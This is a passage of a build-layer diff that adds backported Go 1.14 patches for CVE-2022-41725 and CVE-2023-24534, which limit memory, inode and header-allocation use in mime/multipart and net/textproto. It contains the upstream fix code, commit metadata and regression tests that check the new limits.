++	if err := mw.Close(); err != nil {
++		t.Fatal(err)
++	}
++	req, err := NewRequest("POST", cst.URL, fBuf)
++	if err != nil {
++		t.Fatal(err)
++	}
++	req.Header.Set("Content-Type", mw.FormDataContentType())
++	res, err := cst.Client().Do(req)
++	if err != nil {
++		t.Fatal(err)
++	}
++	res.Body.Close()
++	if g, w := res.StatusCode, StatusBadRequest; g != w {
++		t.Fatalf("Status code mismatch: got %d, want %d", g, w)
++	}
++}
++
+ func TestRedirect_h1(t *testing.T) { testRedirect(t, h1Mode) }
+ func TestRedirect_h2(t *testing.T) { testRedirect(t, h2Mode) }
+ func testRedirect(t *testing.T, h2 bool) {
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre3.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre3.patch
new file mode 100644
index 0000000000..767225b888
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre3.patch
@@ -0,0 +1,98 @@
+From 5246fa5e75b129a7dbd9722aa4de0cbaf7ceae43 Mon Sep 17 00:00:00 2001
+From: Russ Cox <rsc@golang.org>
+Date: Thu, 3 Dec 2020 09:45:07 -0500
+Subject: [PATCH] mime/multipart: handle ReadForm(math.MaxInt64) better
+
+Returning an error about integer overflow is needlessly pedantic.
+The meaning of ReadForm(MaxInt64) is easily understood
+(accept a lot of data) and can be implemented.
+
+Fixes #40430.
+
+Change-Id: I8a522033dd9a2f9ad31dd2ad82cf08d553736ab9
+Reviewed-on: https://go-review.googlesource.com/c/go/+/275112
+Trust: Russ Cox <rsc@golang.org>
+Run-TryBot: Russ Cox <rsc@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Ian Lance Taylor <iant@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5246fa5e75b129a7dbd9722aa4de0cbaf7ceae43]
+CVE: CVE-2022-41725 #Dependency Patch3
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata.go      |  8 ++++++--
+ src/mime/multipart/formdata_test.go | 14 +++++---------
+ src/net/http/request_test.go        |  2 +-
+ 3 files changed, 12 insertions(+), 12 deletions(-)
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index 4eb31012941ac..9c42ea8c023b5 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -7,9 +7,9 @@ package multipart
+ import (
+ 	"bytes"
+ 	"errors"
+-	"fmt"
+ 	"io"
+ 	"io/ioutil"
++	"math"
+ 	"net/textproto"
+ 	"os"
+ )
+@@ -43,7 +43,11 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ 	// Reserve an additional 10 MB for non-file parts.
+ 	maxValueBytes := maxMemory + int64(10<<20)
+ 	if maxValueBytes <= 0 {
+-		return nil, fmt.Errorf("multipart: integer overflow from maxMemory(%d) + 10MiB for non-file parts", maxMemory)
++		if maxMemory < 0 {
++			maxValueBytes = 0
++		} else {
++			maxValueBytes = math.MaxInt64
++		}
+ 	}
+ 	for {
+ 		p, err := r.NextPart()
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index 7112e0d3727fe..e3a3a3eae8e15 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -53,20 +53,16 @@ func TestReadFormWithNamelessFile(t *testing.T) {
+ 	}
+ }
+ 
+-// Issue 40430: Ensure that we report integer overflows in additions of maxMemory,
+-// instead of silently and subtly failing without indication.
++// Issue 40430: Handle ReadForm(math.MaxInt64)
+ func TestReadFormMaxMemoryOverflow(t *testing.T) {
+ 	b := strings.NewReader(strings.ReplaceAll(messageWithTextContentType, "\n", "\r\n"))
+ 	r := NewReader(b, boundary)
+ 	f, err := r.ReadForm(math.MaxInt64)
+-	if err == nil {
+-		t.Fatal("Unexpected a non-nil error")
+-	}
+-	if f != nil {
+-		t.Fatalf("Unexpected returned a non-nil form: %v\n", f)
++	if err != nil {
++		t.Fatalf("ReadForm(MaxInt64): %v", err)
+ 	}
+-	if g, w := err.Error(), "integer overflow from maxMemory"; !strings.Contains(g, w) {
+-		t.Errorf(`Error mismatch\n%q\ndid not contain\n%q`, g, w)
++	if f == nil {
++		t.Fatal("ReadForm(MaxInt64): missing form")
+ 	}
+ }
+ 
+diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
+index 19526b9ad791a..689498e19d5dd 100644
+--- a/src/net/http/request_test.go
++++ b/src/net/http/request_test.go
+@@ -285,7 +285,7 @@ func TestMaxInt64ForMultipartFormMaxMemoryOverflow(t *testing.T) {
+ 		t.Fatal(err)
+ 	}
+ 	res.Body.Close()
+-	if g, w := res.StatusCode, StatusBadRequest; g != w {
++	if g, w := res.StatusCode, StatusOK; g != w {
+ 		t.Fatalf("Status code mismatch: got %d, want %d", g, w)
+ 	}
+ }
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41725.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725.patch
new file mode 100644
index 0000000000..5f80c62b0b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725.patch
@@ -0,0 +1,660 @@
+From 5c55ac9bf1e5f779220294c843526536605f42ab Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Wed, 25 Jan 2023 09:27:01 -0800
+Subject: [PATCH] [release-branch.go1.19] mime/multipart: limit memory/inode consumption of ReadForm
+
+Reader.ReadForm is documented as storing "up to maxMemory bytes + 10MB"
+in memory. Parsed forms can consume substantially more memory than
+this limit, since ReadForm does not account for map entry overhead
+and MIME headers.
+
+In addition, while the amount of disk memory consumed by ReadForm can
+be constrained by limiting the size of the parsed input, ReadForm will
+create one temporary file per form part stored on disk, potentially
+consuming a large number of inodes.
+
+Update ReadForm's memory accounting to include part names,
+MIME headers, and map entry overhead.
+
+Update ReadForm to store all on-disk file parts in a single
+temporary file.
+
+Files returned by FileHeader.Open are documented as having a concrete
+type of *os.File when a file is stored on disk. The change to use a
+single temporary file for all parts means that this is no longer the
+case when a form contains more than a single file part stored on disk.
+
+The previous behavior of storing each file part in a separate disk
+file may be reenabled with GODEBUG=multipartfiles=distinct.
+
+Update Reader.NextPart and Reader.NextRawPart to set a 10MiB cap
+on the size of MIME headers.
+
+Thanks to Jakob Ackermann (@das7pad) for reporting this issue.
+
+Updates #58006
+Fixes #58362
+Fixes CVE-2022-41725
+
+Change-Id: Ibd780a6c4c83ac8bcfd3cbe344f042e9940f2eab
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1714276
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Run-TryBot: Damien Neil <dneil@google.com>
+(cherry picked from commit ed4664330edcd91b24914c9371c377c132dbce8c)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1728949
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/468116
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Than McIntosh <thanm@google.com>
+Run-TryBot: Michael Pratt <mpratt@google.com>
+Auto-Submit: Michael Pratt <mpratt@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5c55ac9bf1e5f779220294c843526536605f42ab]
+CVE: CVE-2022-41725
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata.go       | 132 ++++++++++++++++++++-----
+ src/mime/multipart/formdata_test.go  | 140 ++++++++++++++++++++++++++-
+ src/mime/multipart/multipart.go      |  25 +++--
+ src/mime/multipart/readmimeheader.go |  14 +++
+ src/net/http/request_test.go         |   2 +-
+ src/net/textproto/reader.go          |  27 ++++++
+ 6 files changed, 303 insertions(+), 37 deletions(-)
+ create mode 100644 src/mime/multipart/readmimeheader.go
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index 9c42ea8..1eeb340 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -7,6 +7,7 @@ package multipart
+ import (
+ 	"bytes"
+ 	"errors"
++	"internal/godebug"
+ 	"io"
+ 	"io/ioutil"
+ 	"math"
+@@ -34,23 +35,58 @@ func (r *Reader) ReadForm(maxMemory int64) (*Form, error) {
+ 
+ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ 	form := &Form{make(map[string][]string), make(map[string][]*FileHeader)}
++	var (
++		file    *os.File
++		fileOff int64
++	)
++	numDiskFiles := 0
++	multipartFiles := godebug.Get("multipartfiles")
++	combineFiles := multipartFiles != "distinct"
+ 	defer func() {
++		if file != nil {
++			if cerr := file.Close(); err == nil {
++				err = cerr
++			}
++		}
++		if combineFiles && numDiskFiles > 1 {
++			for _, fhs := range form.File {
++				for _, fh := range fhs {
++					fh.tmpshared = true
++				}
++			}
++		}
+ 		if err != nil {
+ 			form.RemoveAll()
++			if file != nil {
++				os.Remove(file.Name())
++			}
+ 		}
+ 	}()
+ 
+-	// Reserve an additional 10 MB for non-file parts.
+-	maxValueBytes := maxMemory + int64(10<<20)
+-	if maxValueBytes <= 0 {
++	// maxFileMemoryBytes is the maximum bytes of file data we will store in memory.
++	// Data past this limit is written to disk.
++	// This limit strictly applies to content, not metadata (filenames, MIME headers, etc.),
++	// since metadata is always stored in memory, not disk.
++	//
++	// maxMemoryBytes is the maximum bytes we will store in memory, including file content,
++	// non-file part values, metdata, and map entry overhead.
++	//
++	// We reserve an additional 10 MB in maxMemoryBytes for non-file data.
++	//
++	// The relationship between these parameters, as well as the overly-large and
++	// unconfigurable 10 MB added on to maxMemory, is unfortunate but difficult to change
++	// within the constraints of the API as documented.
++	maxFileMemoryBytes := maxMemory
++	maxMemoryBytes := maxMemory + int64(10<<20)
++	if maxMemoryBytes <= 0 {
+ 		if maxMemory < 0 {
+-			maxValueBytes = 0
++			maxMemoryBytes = 0
+ 		} else {
+-			maxValueBytes = math.MaxInt64
++			maxMemoryBytes = math.MaxInt64
+ 		}
+ 	}
+ 	for {
+-		p, err := r.NextPart()
++		p, err := r.nextPart(false, maxMemoryBytes)
+ 		if err == io.EOF {
+ 			break
+ 		}
+@@ -64,16 +100,27 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ 		}
+ 		filename := p.FileName()
+ 
++		// Multiple values for the same key (one map entry, longer slice) are cheaper
++		// than the same number of values for different keys (many map entries), but
++		// using a consistent per-value cost for overhead is simpler.
++		maxMemoryBytes -= int64(len(name))
++		maxMemoryBytes -= 100 // map overhead
++		if maxMemoryBytes < 0 {
++			// We can't actually take this path, since nextPart would already have
++			// rejected the MIME headers for being too large. Check anyway.
++			return nil, ErrMessageTooLarge
++		}
++
+ 		var b bytes.Buffer
+ 
+ 		if filename == "" {
+ 			// value, store as string in memory
+-			n, err := io.CopyN(&b, p, maxValueBytes+1)
++			n, err := io.CopyN(&b, p, maxMemoryBytes+1)
+ 			if err != nil && err != io.EOF {
+ 				return nil, err
+ 			}
+-			maxValueBytes -= n
+-			if maxValueBytes < 0 {
++			maxMemoryBytes -= n
++			if maxMemoryBytes < 0 {
+ 				return nil, ErrMessageTooLarge
+ 			}
+ 			form.Value[name] = append(form.Value[name], b.String())
+@@ -81,35 +128,45 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ 		}
+ 
+ 		// file, store in memory or on disk
++		maxMemoryBytes -= mimeHeaderSize(p.Header)
++		if maxMemoryBytes < 0 {
++			return nil, ErrMessageTooLarge
++		}
+ 		fh := &FileHeader{
+ 			Filename: filename,
+ 			Header:   p.Header,
+ 		}
+-		n, err := io.CopyN(&b, p, maxMemory+1)
++		n, err := io.CopyN(&b, p, maxFileMemoryBytes+1)
+ 		if err != nil && err != io.EOF {
+ 			return nil, err
+ 		}
+-		if n > maxMemory {
+-			// too big, write to disk and flush buffer
+-			file, err := ioutil.TempFile("", "multipart-")
+-			if err != nil {
+-				return nil, err
++		if n > maxFileMemoryBytes {
++			if file == nil {
++				file, err = ioutil.TempFile(r.tempDir, "multipart-")
++				if err != nil {
++					return nil, err
++				}
+ 			}
++			numDiskFiles++
+ 			size, err := io.Copy(file, io.MultiReader(&b, p))
+-			if cerr := file.Close(); err == nil {
+-				err = cerr
+-			}
+ 			if err != nil {
+-				os.Remove(file.Name())
+ 				return nil, err
+ 			}
+ 			fh.tmpfile = file.Name()
+ 			fh.Size = size
++			fh.tmpoff = fileOff
++			fileOff += size
++			if !combineFiles {
++				if err := file.Close(); err != nil {
++					return nil, err
++				}
++				file = nil
++			}
+ 		} else {
+ 			fh.content = b.Bytes()
+ 			fh.Size = int64(len(fh.content))
+-			maxMemory -= n
+-			maxValueBytes -= n
++			maxFileMemoryBytes -= n
++			maxMemoryBytes -= n
+ 		}
+ 		form.File[name] = append(form.File[name], fh)
+ 	}
+@@ -117,6 +174,17 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ 	return form, nil
+ }
+ 
++func mimeHeaderSize(h textproto.MIMEHeader) (size int64) {
++	for k, vs := range h {
++		size += int64(len(k))
++		size += 100 // map entry overhead
++		for _, v := range vs {
++			size += int64(len(v))
++		}
++	}
++	return size
++}
++
+ // Form is a parsed multipart form.
+ // Its File parts are stored either in memory or on disk,
+ // and are accessible via the *FileHeader's Open method.
+@@ -134,7 +202,7 @@ func (f *Form) RemoveAll() error {
+ 		for _, fh := range fhs {
+ 			if fh.tmpfile != "" {
+ 				e := os.Remove(fh.tmpfile)
+-				if e != nil && err == nil {
++				if e != nil && !errors.Is(e, os.ErrNotExist) && err == nil {
+ 					err = e
+ 				}
+ 			}
+@@ -149,15 +217,25 @@ type FileHeader struct {
+ 	Header   textproto.MIMEHeader
+ 	Size     int64
+ 
+-	content []byte
+-	tmpfile string
++	content   []byte
++	tmpfile   string
++	tmpoff    int64
++	tmpshared bool
+ }
+ 
+ // Open opens and returns the FileHeader's associated File.
+ func (fh *FileHeader) Open() (File, error) {
+ 	if b := fh.content; b != nil {
+ 		r := io.NewSectionReader(bytes.NewReader(b), 0, int64(len(b)))
+-		return sectionReadCloser{r}, nil
++		return sectionReadCloser{r, nil}, nil
++	}
++	if fh.tmpshared {
++		f, err := os.Open(fh.tmpfile)
++		if err != nil {
++			return nil, err
++		}
++		r := io.NewSectionReader(f, fh.tmpoff, fh.Size)
++		return sectionReadCloser{r, f}, nil
+ 	}
+ 	return os.Open(fh.tmpfile)
+ }
+@@ -176,8 +254,12 @@ type File interface {
+ 
+ type sectionReadCloser struct {
+ 	*io.SectionReader
++	io.Closer
+ }
+ 
+ func (rc sectionReadCloser) Close() error {
++	if rc.Closer != nil {
++		return rc.Closer.Close()
++	}
+ 	return nil
+ }
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index e3a3a3e..5cded71 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -6,8 +6,10 @@ package multipart
+ 
+ import (
+ 	"bytes"
++	"fmt"
+ 	"io"
+ 	"math"
++	"net/textproto"
+ 	"os"
+ 	"strings"
+ 	"testing"
+@@ -208,8 +210,8 @@ Content-Disposition: form-data; name="largetext"
+ 		maxMemory int64
+ 		err       error
+ 	}{
+-		{"smaller", 50, nil},
+-		{"exact-fit", 25, nil},
++		{"smaller", 50 + int64(len("largetext")) + 100, nil},
++		{"exact-fit", 25 + int64(len("largetext")) + 100, nil},
+ 		{"too-large", 0, ErrMessageTooLarge},
+ 	}
+ 	for _, tc := range testCases {
+@@ -224,7 +226,7 @@ Content-Disposition: form-data; name="largetext"
+ 				defer f.RemoveAll()
+ 			}
+ 			if tc.err != err {
+-				t.Fatalf("ReadForm error - got: %v; expected: %v", tc.err, err)
++				t.Fatalf("ReadForm error - got: %v; expected: %v", err, tc.err)
+ 			}
+ 			if err == nil {
+ 				if g := f.Value["largetext"][0]; g != largeTextValue {
+@@ -234,3 +236,135 @@ Content-Disposition: form-data; name="largetext"
+ 		})
+ 	}
+ }
++
++// TestReadForm_MetadataTooLarge verifies that we account for the size of field names,
++// MIME headers, and map entry overhead while limiting the memory consumption of parsed forms.
++func TestReadForm_MetadataTooLarge(t *testing.T) {
++	for _, test := range []struct {
++		name string
++		f    func(*Writer)
++	}{{
++		name: "large name",
++		f: func(fw *Writer) {
++			name := strings.Repeat("a", 10<<20)
++			w, _ := fw.CreateFormField(name)
++			w.Write([]byte("value"))
++		},
++	}, {
++		name: "large MIME header",
++		f: func(fw *Writer) {
++			h := make(textproto.MIMEHeader)
++			h.Set("Content-Disposition", `form-data; name="a"`)
++			h.Set("X-Foo", strings.Repeat("a", 10<<20))
++			w, _ := fw.CreatePart(h)
++			w.Write([]byte("value"))
++		},
++	}, {
++		name: "many parts",
++		f: func(fw *Writer) {
++			for i := 0; i < 110000; i++ {
++				w, _ := fw.CreateFormField("f")
++				w.Write([]byte("v"))
++			}
++		},
++	}} {
++		t.Run(test.name, func(t *testing.T) {
++			var buf bytes.Buffer
++			fw := NewWriter(&buf)
++			test.f(fw)
++			if err := fw.Close(); err != nil {
++				t.Fatal(err)
++			}
++			fr := NewReader(&buf, fw.Boundary())
++			_, err := fr.ReadForm(0)
++			if err != ErrMessageTooLarge {
++				t.Errorf("fr.ReadForm() = %v, want ErrMessageTooLarge", err)
++			}
++		})
++	}
++}
++
++// TestReadForm_ManyFiles_Combined tests that a multipart form containing many files only
++// results in a single on-disk file.
++func TestReadForm_ManyFiles_Combined(t *testing.T) {
++	const distinct = false
++	testReadFormManyFiles(t, distinct)
++}
++
++// TestReadForm_ManyFiles_Distinct tests that setting GODEBUG=multipartfiles=distinct
++// results in every file in a multipart form being placed in a distinct on-disk file.
++func TestReadForm_ManyFiles_Distinct(t *testing.T) {
++	t.Setenv("GODEBUG", "multipartfiles=distinct")
++	const distinct = true
++	testReadFormManyFiles(t, distinct)
++}
++
++func testReadFormManyFiles(t *testing.T, distinct bool) {
++	var buf bytes.Buffer
++	fw := NewWriter(&buf)
++	const numFiles = 10
++	for i := 0; i < numFiles; i++ {
++		name := fmt.Sprint(i)
++		w, err := fw.CreateFormFile(name, name)
++		if err != nil {
++			t.Fatal(err)
++		}
++		w.Write([]byte(name))
++	}
++	if err := fw.Close(); err != nil {
++		t.Fatal(err)
++	}
++	fr := NewReader(&buf, fw.Boundary())
++	fr.tempDir = t.TempDir()
++	form, err := fr.ReadForm(0)
++	if err != nil {
++		t.Fatal(err)
++	}
++	for i := 0; i < numFiles; i++ {
++		name := fmt.Sprint(i)
++		if got := len(form.File[name]); got != 1 {
++			t.Fatalf("form.File[%q] has %v entries, want 1", name, got)
++		}
++		fh := form.File[name][0]
++		file, err := fh.Open()
++		if err != nil {
++			t.Fatalf("form.File[%q].Open() = %v", name, err)
++		}
++		if distinct {
++			if _, ok := file.(*os.File); !ok {
++				t.Fatalf("form.File[%q].Open: %T, want *os.File", name, file)
++			}
++		}
++		got, err := io.ReadAll(file)
++		file.Close()
++		if string(got) != name || err != nil {
++			t.Fatalf("read form.File[%q]: %q, %v; want %q, nil", name, string(got), err, name)
++		}
++	}
++	dir, err := os.Open(fr.tempDir)
++	if err != nil {
++		t.Fatal(err)
++	}
++	defer dir.Close()
++	names, err := dir.Readdirnames(0)
++	if err != nil {
++		t.Fatal(err)
++	}
++	wantNames := 1
++	if distinct {
++		wantNames = numFiles
++	}
++	if len(names) != wantNames {
++		t.Fatalf("temp dir contains %v files; want 1", len(names))
++	}
++	if err := form.RemoveAll(); err != nil {
++		t.Fatalf("form.RemoveAll() = %v", err)
++	}
++	names, err = dir.Readdirnames(0)
++	if err != nil {
++		t.Fatal(err)
++	}
++	if len(names) != 0 {
++		t.Fatalf("temp dir contains %v files; want 0", len(names))
++	}
++}
+diff --git a/src/mime/multipart/multipart.go b/src/mime/multipart/multipart.go
+index 1750300..958cef8 100644
+--- a/src/mime/multipart/multipart.go
++++ b/src/mime/multipart/multipart.go
+@@ -121,12 +121,12 @@ func (r *stickyErrorReader) Read(p []byte) (n int, _ error) {
+ 	return n, r.err
+ }
+ 
+-func newPart(mr *Reader, rawPart bool) (*Part, error) {
++func newPart(mr *Reader, rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
+ 	bp := &Part{
+ 		Header: make(map[string][]string),
+ 		mr:     mr,
+ 	}
+-	if err := bp.populateHeaders(); err != nil {
++	if err := bp.populateHeaders(maxMIMEHeaderSize); err != nil {
+ 		return nil, err
+ 	}
+ 	bp.r = partReader{bp}
+@@ -142,12 +142,16 @@ func newPart(mr *Reader, rawPart bool) (*Part, error) {
+ 	return bp, nil
+ }
+ 
+-func (bp *Part) populateHeaders() error {
++func (bp *Part) populateHeaders(maxMIMEHeaderSize int64) error {
+ 	r := textproto.NewReader(bp.mr.bufReader)
+-	header, err := r.ReadMIMEHeader()
++	header, err := readMIMEHeader(r, maxMIMEHeaderSize)
+ 	if err == nil {
+ 		bp.Header = header
+ 	}
++	// TODO: Add a distinguishable error to net/textproto.
++	if err != nil && err.Error() == "message too large" {
++		err = ErrMessageTooLarge
++	}
+ 	return err
+ }
+ 
+@@ -287,6 +291,7 @@ func (p *Part) Close() error {
+ // isn't supported.
+ type Reader struct {
+ 	bufReader *bufio.Reader
++	tempDir   string // used in tests
+ 
+ 	currentPart *Part
+ 	partsRead   int
+@@ -297,6 +302,10 @@ type Reader struct {
+ 	dashBoundary     []byte // "--boundary"
+ }
+ 
++// maxMIMEHeaderSize is the maximum size of a MIME header we will parse,
++// including header keys, values, and map overhead.
++const maxMIMEHeaderSize = 10 << 20
++
+ // NextPart returns the next part in the multipart or an error.
+ // When there are no more parts, the error io.EOF is returned.
+ //
+@@ -304,7 +313,7 @@ type Reader struct {
+ // has a value of "quoted-printable", that header is instead
+ // hidden and the body is transparently decoded during Read calls.
+ func (r *Reader) NextPart() (*Part, error) {
+-	return r.nextPart(false)
++	return r.nextPart(false, maxMIMEHeaderSize)
+ }
+ 
+ // NextRawPart returns the next part in the multipart or an error.
+@@ -313,10 +322,10 @@ func (r *Reader) NextPart() (*Part, error) {
+ // Unlike NextPart, it does not have special handling for
+ // "Content-Transfer-Encoding: quoted-printable".
+ func (r *Reader) NextRawPart() (*Part, error) {
+-	return r.nextPart(true)
++	return r.nextPart(true, maxMIMEHeaderSize)
+ }
+ 
+-func (r *Reader) nextPart(rawPart bool) (*Part, error) {
++func (r *Reader) nextPart(rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
+ 	if r.currentPart != nil {
+ 		r.currentPart.Close()
+ 	}
+@@ -341,7 +350,7 @@ func (r *Reader) nextPart(rawPart bool) (*Part, error) {
+ 
+ 		if r.isBoundaryDelimiterLine(line) {
+ 			r.partsRead++
+-			bp, err := newPart(r, rawPart)
++			bp, err := newPart(r, rawPart, maxMIMEHeaderSize)
+ 			if err != nil {
+ 				return nil, err
+ 			}
+diff --git a/src/mime/multipart/readmimeheader.go b/src/mime/multipart/readmimeheader.go
+new file mode 100644
+index 0000000..6836928
+--- /dev/null
++++ b/src/mime/multipart/readmimeheader.go
+@@ -0,0 +1,14 @@
++// Copyright 2023 The Go Authors. All rights reserved.
++// Use of this source code is governed by a BSD-style
++// license that can be found in the LICENSE file.
++package multipart
++
++import (
++	"net/textproto"
++	_ "unsafe" // for go:linkname
++)
++
++// readMIMEHeader is defined in package net/textproto.
++//
++//go:linkname readMIMEHeader net/textproto.readMIMEHeader
++func readMIMEHeader(r *textproto.Reader, lim int64) (textproto.MIMEHeader, error)
+diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
+index 94133ee..170d3f5 100644
+--- a/src/net/http/request_test.go
++++ b/src/net/http/request_test.go
+@@ -962,7 +962,7 @@ func testMissingFile(t *testing.T, req *Request) {
+ 		t.Errorf("FormFile file = %v, want nil", f)
+ 	}
+ 	if fh != nil {
+-		t.Errorf("FormFile file header = %q, want nil", fh)
++		t.Errorf("FormFile file header = %v, want nil", fh)
+ 	}
+ 	if err != ErrMissingFile {
+ 		t.Errorf("FormFile err = %q, want ErrMissingFile", err)
+diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
+index f63f5ec..96553fb 100644
+--- a/src/net/textproto/reader.go
++++ b/src/net/textproto/reader.go
+@@ -7,9 +7,11 @@ package textproto
+ import (
+ 	"bufio"
+ 	"bytes"
++	"errors"
+ 	"fmt"
+ 	"io"
+ 	"io/ioutil"
++	"math"
+ 	"strconv"
+ 	"strings"
+ 	"sync"
+@@ -482,6 +484,12 @@ func (r *Reader) ReadDotLines() ([]string, error) {
+ //	}
+ //
+ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
++	return readMIMEHeader(r, math.MaxInt64)
++}
++
++// readMIMEHeader is a version of ReadMIMEHeader which takes a limit on the header size.
++// It is called by the mime/multipart package.
++func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
+ 	// Avoid lots of small slice allocations later by allocating one
+ 	// large one ahead of time which we'll cut up into smaller
+ 	// slices. If this isn't big enough later, we allocate small ones.
+@@ -525,6 +533,15 @@ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
+ 			continue
+ 		}
+ 
++		// backport 5c55ac9bf1e5f779220294c843526536605f42ab
++		//
++		// value is computed as
++		// value := string(bytes.TrimLeft(v, " \t"))
++		//
++		// in the original patch from 1.19.  This relies on
++		// 'v' which does not exist in 1.14.  We leave the
++		// 1.14 method unchanged.
++
+ 		// Skip initial spaces in value.
+ 		i++ // skip colon
+ 		for i < len(kv) && (kv[i] == ' ' || kv[i] == '\t') {
+@@ -533,6 +550,16 @@ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
+ 		value := string(kv[i:])
+ 
+ 		vv := m[key]
++		if vv == nil {
++			lim -= int64(len(key))
++			lim -= 100 // map entry overhead
++		}
++		lim -= int64(len(value))
++		if lim < 0 {
++			// TODO: This should be a distinguishable error (ErrMessageTooLarge)
++			// to allow mime/multipart to detect it.
++			return m, errors.New("message too large")
++		}
+ 		if vv == nil && len(strs) > 0 {
+ 			// More than likely this will be a single-element key.
+ 			// Most headers aren't multi-valued.
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24534.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24534.patch
new file mode 100644
index 0000000000..d50db04bed
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24534.patch
@@ -0,0 +1,200 @@
+From d6759e7a059f4208f07aa781402841d7ddaaef96 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Fri, 10 Mar 2023 14:21:05 -0800
+Subject: [PATCH] [release-branch.go1.19] net/textproto: avoid overpredicting
+ the number of MIME header keys
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802452
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+(cherry picked from commit f739f080a72fd5b06d35c8e244165159645e2ed6)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802393
+Reviewed-by: Damien Neil <dneil@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Change-Id: I675451438d619a9130360c56daf529559004903f
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481982
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/d6759e7a059f4208f07aa781402841d7ddaaef96]
+CVE: CVE-2023-24534
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/bytes/bytes.go               | 13 +++++++
+ src/net/textproto/reader.go      | 31 +++++++++++------
+ src/net/textproto/reader_test.go | 59 ++++++++++++++++++++++++++++++++
+ 3 files changed, 92 insertions(+), 11 deletions(-)
+
+diff --git a/src/bytes/bytes.go b/src/bytes/bytes.go
+index e872cc2..1f0d760 100644
+--- a/src/bytes/bytes.go
++++ b/src/bytes/bytes.go
+@@ -1078,6 +1078,19 @@ func Index(s, sep []byte) int {
+	return -1
+ }
+
++// Cut slices s around the first instance of sep,
++// returning the text before and after sep.
++// The found result reports whether sep appears in s.
++// If sep does not appear in s, cut returns s, nil, false.
++//
++// Cut returns slices of the original slice s, not copies.
++func Cut(s, sep []byte) (before, after []byte, found bool) {
++	if i := Index(s, sep); i >= 0 {
++		return s[:i], s[i+len(sep):], true
++	}
++	return s, nil, false
++}
++
+ func indexRabinKarp(s, sep []byte) int {
+	// Rabin-Karp search
+	hashsep, pow := hashStr(sep)
+diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
+index a505da9..8d547fe 100644
+--- a/src/net/textproto/reader.go
++++ b/src/net/textproto/reader.go
+@@ -486,8 +487,11 @@ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
+	// large one ahead of time which we'll cut up into smaller
+	// slices. If this isn't big enough later, we allocate small ones.
+	var strs []string
+-	hint := r.upcomingHeaderNewlines()
++	hint := r.upcomingHeaderKeys()
+	if hint > 0 {
++		if hint > 1000 {
++			hint = 1000 // set a cap to avoid overallocation
++		}
+		strs = make([]string, hint)
+	}
+
+@@ -562,9 +566,11 @@ func mustHaveFieldNameColon(line []byte) error {
+	return nil
+ }
+
